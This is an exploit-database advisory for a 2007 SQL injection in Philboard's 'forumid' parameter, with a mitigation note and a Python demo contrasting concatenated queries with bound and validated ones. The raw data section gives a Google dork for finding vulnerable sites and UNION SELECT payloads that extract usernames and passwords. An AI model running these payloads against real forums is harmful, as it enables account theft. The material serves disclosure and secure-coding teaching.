Vendor: Philboard
By: xoron
CVSS: 7.5 (HIGH)
Remote SQL Injection
CWE: 89
Product Name: Philboard
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Philboard (id) Remote SQL Injection

The vulnerability exists in the 'philboard_forum.asp' file, where an attacker can inject SQL queries through the 'forumid' parameter. By manipulating the SQL query, an attacker can retrieve sensitive information such as usernames and passwords from the database.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input before using it in SQL queries or use prepared statements.
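
The two mitigations named above, shown beside the vulnerable pattern. This is an added example in Python with sqlite3, not Philboard's ASP code; the 21-column `topics` table, the `users` rows and all function names are constructed stand-ins, and the payload is the advisory's own "Username" example with "+" decoded to spaces.

```python
import sqlite3

# Payload copied from the advisory's "Username" example, "+" URL-decoded to spaces.
ADVISORY_PAYLOAD = ("-1 union select 0,username,2,3,4,5,6,7,8,7,8,9,10,"
                    "11,12,13,14,15,16,17,18 from users")

def make_db():
    """Constructed stand-in schema: a 21-column topic table plus a users table."""
    db = sqlite3.connect(":memory:")
    cols = ["forumid INTEGER", "title TEXT"] + [f"c{i} INTEGER" for i in range(2, 21)]
    db.execute(f"CREATE TABLE topics ({', '.join(cols)})")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO topics (forumid, title) VALUES (1, 'Welcome')")
    db.execute("INSERT INTO users VALUES ('alice', 'constructed-secret')")
    return db

def topics_unsafe(db, forumid):
    # Vulnerable pattern: the request value is concatenated into the SQL text,
    # so the database parses it as part of the statement.
    return db.execute("SELECT * FROM topics WHERE forumid = " + forumid).fetchall()

def parse_forum_id(raw):
    # Allow-list validation: forumid must be a short run of ASCII digits.
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 9):
        raise ValueError("forumid must be a non-negative integer")
    return int(raw)

def topics_bound_only(db, forumid):
    # Prepared statement without validation: the value is bound as data
    # and compared to the column, never parsed as SQL.
    return db.execute("SELECT * FROM topics WHERE forumid = ?", (forumid,)).fetchall()

def topics_safe(db, forumid):
    # Both mitigations together: validate first, then bind the integer.
    return db.execute("SELECT * FROM topics WHERE forumid = ?",
                      (parse_forum_id(forumid),)).fetchall()
```

With the concatenated query the payload returns the `users` rows in place of topics; with a bound parameter it matches nothing, and with validation it is rejected before any query runs.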

Exploit-DB raw data:

----------------------------------------------------

Philboard (id) Remote SQL Injection

----------------------------------------------------

Found by: xoron

xoron.info - xoron.biz

Google Dork : "Powered by Philboard" , "inurl:philboard_forum.asp"

----------------------------------------------------

Exploit: philboard_forum.asp?forumid=[SQL]

----------------------------------------------------

Example:

Username
philboard_forum.asp?forumid=-1+union+select+0,username,2,3,4,5,6,7,8,7,8,9,10,11,12,13,14,15,16,17,18+from+users

Password
philboard_forum.asp?forumid=-1+union+select+0,password,2,3,4,5,6,7,8,7,8,9,10,11,12,13,14,15,16,17,18+from+users

----------------------------------------------------

Forum: username + password

----------------------------------------------------

Download: open http://www.aspindir.com/indir.asp?id=3538 and click "İndirmek için tıklayın".

----------------------------------------------------

# milw0rm.com [2007-02-12]